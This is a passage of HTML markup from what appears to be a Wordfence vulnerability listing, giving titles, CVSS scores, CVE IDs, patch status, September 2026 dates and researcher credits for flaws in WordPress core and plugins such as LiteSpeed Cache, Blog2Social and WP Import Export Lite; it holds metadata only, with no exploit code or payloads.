					<strong>4.7 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-89307" target="_blank" rel="noopener noreferrer">							CVE-2026-89307						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/UNKNOWN-CVE-2026-87791" target="_blank" rel="noopener">design-scuole-wordpress-theme</a> <span class="wfvr-software-slug">[design-scuole-wordpress-theme]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
									<strong>Researcher(s):</strong> Unknown
							</div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/54a0cdbd-4c3d-4bdd-98fa-f99715fd80bb" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/863c29b7-892f-4520-92db-66431c10fac8" target="_blank" rel="noopener">Import Export Lite &lt;= 3.9.34 &#8211; Authenticated (Admin+) Privilege Escalation</a></h4>
<div class="cvss-score-badge">4.7</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.7 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-76554" target="_blank" rel="noopener noreferrer">							CVE-2026-76554						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-import-export-lite" target="_blank" rel="noopener">WP Import Export Lite</a> <span class="wfvr-software-slug">[wp-import-export-lite]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mak3bread" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/6a757d7b79b347554dafd0b3534c2218.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="6a757d7b79b347554dafd0b3534c2218"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mak3bread" target="_blank" rel="noopener">mak3bread</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/863c29b7-892f-4520-92db-66431c10fac8" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ba236f86-0434-4030-8e14-4db3919226eb" target="_blank" rel="noopener">LiteSpeed Cache &lt;= 7.9 &#8211; Reflected Cross-Site Scripting via ESI &#8216;esi&#8217; Parameter</a></h4>
<div class="cvss-score-badge">4.7</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.7 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-76579" target="_blank" rel="noopener noreferrer">							CVE-2026-76579						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/litespeed-cache" target="_blank" rel="noopener">LiteSpeed Cache</a> <span class="wfvr-software-slug">[litespeed-cache]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mak3bread" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/6a757d7b79b347554dafd0b3534c2218.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="6a757d7b79b347554dafd0b3534c2218"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mak3bread" target="_blank" rel="noopener">mak3bread</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ba236f86-0434-4030-8e14-4db3919226eb" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bd88ebd2-5584-4886-9c85-39a225cd00e9" target="_blank" rel="noopener">WP Ghost (Hide My WP Ghost) &lt;= 7.0.02 &#8211; Unauthenticated Open Redirect via &#8216;redirect_to&#8217; Parameter</a></h4>
<div class="cvss-score-badge">4.7</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.7 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-7527" target="_blank" rel="noopener noreferrer">							CVE-2026-7527						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/hide-my-wp" target="_blank" rel="noopener">Hide My WP Ghost – Security &amp; Firewall</a> <span class="wfvr-software-slug">[hide-my-wp]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mariusz-maik" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/edab1e5d7caf79446c62ca10a30be386.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="edab1e5d7caf79446c62ca10a30be386"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mariusz-maik" target="_blank" rel="noopener">s00me00ne</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bd88ebd2-5584-4886-9c85-39a225cd00e9" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/cc313055-a433-444f-8f83-cf2be1c80652" target="_blank" rel="noopener">Business Name Generator &lt;= 1.3 &#8211; Authenticated (Administrator+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">4.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2025-15698" target="_blank" rel="noopener noreferrer">							CVE-2025-15698						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/designbro-business-name-generator" target="_blank" rel="noopener">Business Name Generator</a> <span class="wfvr-software-slug">[designbro-business-name-generator]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nikhil-gavhane" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/8c6c94a4b473f99248f1373f13eaf816.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8c6c94a4b473f99248f1373f13eaf816"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nikhil-gavhane" target="_blank" rel="noopener">Nikhil Gavhane</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/cc313055-a433-444f-8f83-cf2be1c80652" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/98ef6eeb-9fd5-4ecc-a75a-e17884b9d41a" target="_blank" rel="noopener">CSS &amp; JavaScript Toolbox &lt;= 12.0.6 &#8211; Authenticated (Administrator+) Stored Cross-Site Scripting via Assignment Engine Fields</a></h4>
<div class="cvss-score-badge">4.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2025-13533" target="_blank" rel="noopener noreferrer">							CVE-2025-13533						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/css-javascript-toolbox" target="_blank" rel="noopener">CSS &amp; JavaScript Toolbox</a> <span class="wfvr-software-slug">[css-javascript-toolbox]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chairat-toraya" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/dd825c1225bd78591f13551a4eebb63a.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="dd825c1225bd78591f13551a4eebb63a"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chairat-toraya" target="_blank" rel="noopener">Kyokito</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/98ef6eeb-9fd5-4ecc-a75a-e17884b9d41a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ab4bfd2f-6277-47d6-80ac-957b93476ed1" target="_blank" rel="noopener">OTP Login &amp; Register Woocommerce &lt;= 2.7.3 &#8211; Authenticated (Administrator+) Stored Cross-Site Scripting via &#8216;fb-config&#8217; Setting</a></h4>
<div class="cvss-score-badge">4.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-12402" target="_blank" rel="noopener noreferrer">							CVE-2026-12402						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mobile-login-woocommerce" target="_blank" rel="noopener">OTP Login &amp; Register Woocommerce</a> <span class="wfvr-software-slug">[mobile-login-woocommerce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/luca-jungnickel" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/6754bff8e85ed195d196959c828257ad.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="6754bff8e85ed195d196959c828257ad"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/luca-jungnickel" target="_blank" rel="noopener">Luca Jungnickel</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ab4bfd2f-6277-47d6-80ac-957b93476ed1" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3d59700b-3540-464c-bd27-23bb71f9b082" target="_blank" rel="noopener">WordPress Core &lt;= 7.1 &#8211; Authenticated (Administrator+) Stored Cross-Site Scripting via Custom Header Image Data</a></h4>
<div class="cvss-score-badge">4.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.4 (Medium)</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-core/" target="_blank" rel="noopener">WordPress</a> <span class="wfvr-software-slug">[wordpress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jeremy-felt" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jeremy-felt" target="_blank" rel="noopener">Jeremy Felt</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3d59700b-3540-464c-bd27-23bb71f9b082" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f0886893-9cfd-44cb-8940-03dd99d4c574" target="_blank" rel="noopener">WP2Social Auto Publish &lt;= 2.4.12 &#8211; Authenticated (Administrator+) Stored Cross-Site Scripting via &#8216;pages&#8217; Parameter</a></h4>
<div class="cvss-score-badge">4.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-12042" target="_blank" rel="noopener noreferrer">							CVE-2026-12042						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/facebook-auto-publish" target="_blank" rel="noopener">WP2Social Auto Publish</a> <span class="wfvr-software-slug">[facebook-auto-publish]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/luca-jungnickel" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/6754bff8e85ed195d196959c828257ad.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="6754bff8e85ed195d196959c828257ad"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/luca-jungnickel" target="_blank" rel="noopener">Luca Jungnickel</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f0886893-9cfd-44cb-8940-03dd99d4c574" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4a19496b-7b81-4127-aa57-8d1f41e7e9f0" target="_blank" rel="noopener">Active Products Tables for WooCommerce &lt;= 2.1.2 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-91009" target="_blank" rel="noopener noreferrer">							CVE-2026-91009						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/profit-products-tables-for-woocommerce" target="_blank" rel="noopener">Active Woot Products Tables for WooCommerce. 100% FREE </a> <span class="wfvr-software-slug">[profit-products-tables-for-woocommerce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/junhee-cho" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/e11f235d878446888d690cc5ba93c3ba.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e11f235d878446888d690cc5ba93c3ba"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/junhee-cho" target="_blank" rel="noopener">JunHee CHO</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4a19496b-7b81-4127-aa57-8d1f41e7e9f0" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d024347c-5347-452d-9229-2993ba34d767" target="_blank" rel="noopener">Asset CleanUp: Page Speed Booster &lt;= 1.4.0.5 &#8211; Cross-Site Request Forgery</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66571" target="_blank" rel="noopener noreferrer">							CVE-2026-66571						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-asset-clean-up" target="_blank" rel="noopener">Asset CleanUp: Page Speed Booster</a> <span class="wfvr-software-slug">[wp-asset-clean-up]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/helder-goncalves" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/5a19309c7588118bbb096d9abba61ead.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5a19309c7588118bbb096d9abba61ead"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/helder-goncalves" target="_blank" rel="noopener">Helder Gonçalves</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d024347c-5347-452d-9229-2993ba34d767" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5e8b7b1d-66de-4707-9db1-b9aa87e88f98" target="_blank" rel="noopener">AVideo &lt;= 29.0 &#8211; Cross-Site Request Forgery</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-92579" target="_blank" rel="noopener noreferrer">							CVE-2026-92579						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/avideo" target="_blank" rel="noopener">aVideo</a> <span class="wfvr-software-slug">[avideo]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/rajivraj" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0b89fc5d65efdc4ed0d0d90425b6938.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0b89fc5d65efdc4ed0d0d90425b6938"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/rajivraj" target="_blank" rel="noopener">rajivraj</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5e8b7b1d-66de-4707-9db1-b9aa87e88f98" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2e1bbaa2-5bb3-442e-b4a8-96db98500e7b" target="_blank" rel="noopener">BlockSpare &#8211; Gutenberg Site Builder Blocks &amp; Starter Sites &lt;= 4.2.6 &#8211; Incorrect Authorization to Authenticated (Subscriber+) Arbitrary Post Creation</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-1242" target="_blank" rel="noopener noreferrer">							CVE-2026-1242						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/blockspare" target="_blank" rel="noopener">BlockSpare – Gutenberg Blocks, AI Content Generator &amp; Site Builder for News, Magazine &amp; Blogs</a> <span class="wfvr-software-slug">[blockspare]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/osvaldo-noe-gonzalez-del-rio" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/ed1755942aa6cb7ca0583880be85d3b3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ed1755942aa6cb7ca0583880be85d3b3"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/osvaldo-noe-gonzalez-del-rio" target="_blank" rel="noopener">Osvaldo Noe Gonzalez Del Rio (Os)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2e1bbaa2-5bb3-442e-b4a8-96db98500e7b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6074ebd7-d44b-442f-bdef-532ddd865856" target="_blank" rel="noopener">Blog2Social: Social Media Auto Post &amp; Scheduler &lt;= 9.0.0 &#8211; Authenticated (Subscriber+) Username Enumeration</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-89029" target="_blank" rel="noopener noreferrer">							CVE-2026-89029						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/blog2social" target="_blank" rel="noopener">Blog2Social: Social Media Auto Post &amp; Scheduler</a> <span class="wfvr-software-slug">[blog2social]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/choriyev-qahramon" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4d8876b62aaa83428aafd305d0f556cc.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4d8876b62aaa83428aafd305d0f556cc"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/choriyev-qahramon" target="_blank" rel="noopener">Choriyev Qahramon</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6074ebd7-d44b-442f-bdef-532ddd865856" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1ff179fc-911d-4143-b2a2-5187d2aec67b" target="_blank" rel="noopener">Blog2Social: Social Media Auto Post &amp; Scheduler &lt;= 9.0.0 &#8211; Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-89031" target="_blank" rel="noopener noreferrer">							CVE-2026-89031						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
